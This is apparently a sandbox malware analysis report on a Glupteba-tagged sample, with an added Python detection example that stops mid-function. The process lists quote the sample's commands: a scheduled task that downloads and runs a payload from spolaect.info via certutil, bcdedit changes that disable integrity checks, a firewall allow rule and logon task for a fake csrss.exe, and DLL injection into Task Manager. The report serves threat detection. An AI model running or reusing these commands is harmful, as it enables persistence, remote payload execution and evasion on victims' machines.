Malware Analysis Report

2025-08-05 12:47

Sample ID 240122-vpvjzsahem
Target 6fd9d52463f7b9444ae84fccccc96a3b
SHA256 7bec73f4ea2b19439f13212e476245d88a0cf3da3a90cb27d684614e0a5affef
Tags
glupteba metasploit backdoor dropper evasion loader ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7bec73f4ea2b19439f13212e476245d88a0cf3da3a90cb27d684614e0a5affef

Threat Level: Known bad

The file 6fd9d52463f7b9444ae84fccccc96a3b was found to be: Known bad.

Malicious Activity Summary

glupteba metasploit backdoor dropper evasion loader ransomware trojan

Glupteba payload

MetaSploit

Glupteba

Modifies boot configuration data using bcdedit

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Unsigned PE

Program crash

GoLang User-Agent

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-22 17:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-22 17:10

Reported

2024-01-22 17:13

Platform

win7-20231215-en

Max time kernel

0s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe

"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240122171030.log C:\Windows\Logs\CBS\CbsPersist_20240122171030.cab

C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe

"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe ""

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network


Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-01-22 17:10

Reported

2024-01-22 17:13

Platform

win10v2004-20231215-en

Max time kernel

3s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe

"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 864

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 868

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 920

C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe

"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 332

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 508

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1660

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1444

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe ""

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 976

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1072

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4676 -ip 4676

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1544

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1648

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1612

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1580

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4676 -ip 4676
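
The process list above contains the chain an analyst would want to alert on, buried between the WerFault crash handlers: cmd.exe and netsh add an inbound firewall allow rule for C:\Windows\rss\csrss.exe (a file named like the Client/Server Runtime Subsystem, which only legitimately runs from System32), schtasks registers an ONLOGON task for the same file at the highest run level, the file then runs itself, and injector.exe loads NtQuerySystemInformationHook.dll into taskmgr.exe. NtQuerySystemInformation(SystemProcessInformation) is the call Task Manager uses to enumerate processes, so hooking it inside taskmgr.exe hides a process from the user without touching the kernel. The Python below is an added example written for this report, not sandbox tooling or code from the sample: four command-line rules run over the command lines quoted above plus constructed benign controls. The rule names, the SYSTEM_NAMES list and the benign control lines are assumptions, not vendor detection content.

```python
"""Detection rules for the persistence and evasion chain in the process list above.

Added example for this report; not sandbox tooling or Glupteba code. The rule
names, SYSTEM_NAMES and the benign control lines are assumptions; the suspicious
command lines are copied from the report.
"""
import re
from dataclasses import dataclass

# Where a binary carrying a core Windows process name is expected to live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\sysnative\\")
# Names this rule treats as "must live in a system directory" (assumed list).
SYSTEM_NAMES = {"csrss.exe", "smss.exe", "lsass.exe", "winlogon.exe", "services.exe", "svchost.exe"}

_NETSH_ADD = re.compile(r'netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*?program="([^"]+)"', re.I)
_SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.I)
_TR = re.compile(r'/TR\s+(?:"([^"]+)"|(\S+))', re.I)
# "<injector> <target process name> <dll path>": the shape of the injector call above.
_INJECT = re.compile(r"^(\S+\.exe)\s+([\w.-]+\.exe)\s+(\S+\.dll)\s*$", re.I)

# Lines 1-7 are copied from the report; the last three are constructed benign controls.
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"',
    r"C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4392 -ip 4392",
    r'C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'C:\Windows\rss\csrss.exe ""',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r"C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll",
    r'netsh advfirewall firewall add rule name="Vendor Agent" dir=in action=allow program="C:\Program Files\Vendor\agent.exe" enable=yes',
    r'schtasks /CREATE /SC DAILY /TR "C:\Program Files\Vendor\updater.exe" /TN VendorUpdate /F',
    r"C:\Windows\System32\csrss.exe",
]


@dataclass(frozen=True)
class Finding:
    rule: str    # which rule fired
    detail: str  # normalised path, or "target <- dll" for injection


def _norm(path: str) -> str:
    return path.strip().strip('"').lower()


def masquerades(path: str) -> bool:
    """A core-process file name outside the system directories, e.g. C:\\Windows\\rss\\csrss.exe."""
    p = _norm(path)
    return p.rsplit("\\", 1)[-1] in SYSTEM_NAMES and not p.startswith(SYSTEM_DIRS)


def image_of(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted image path."""
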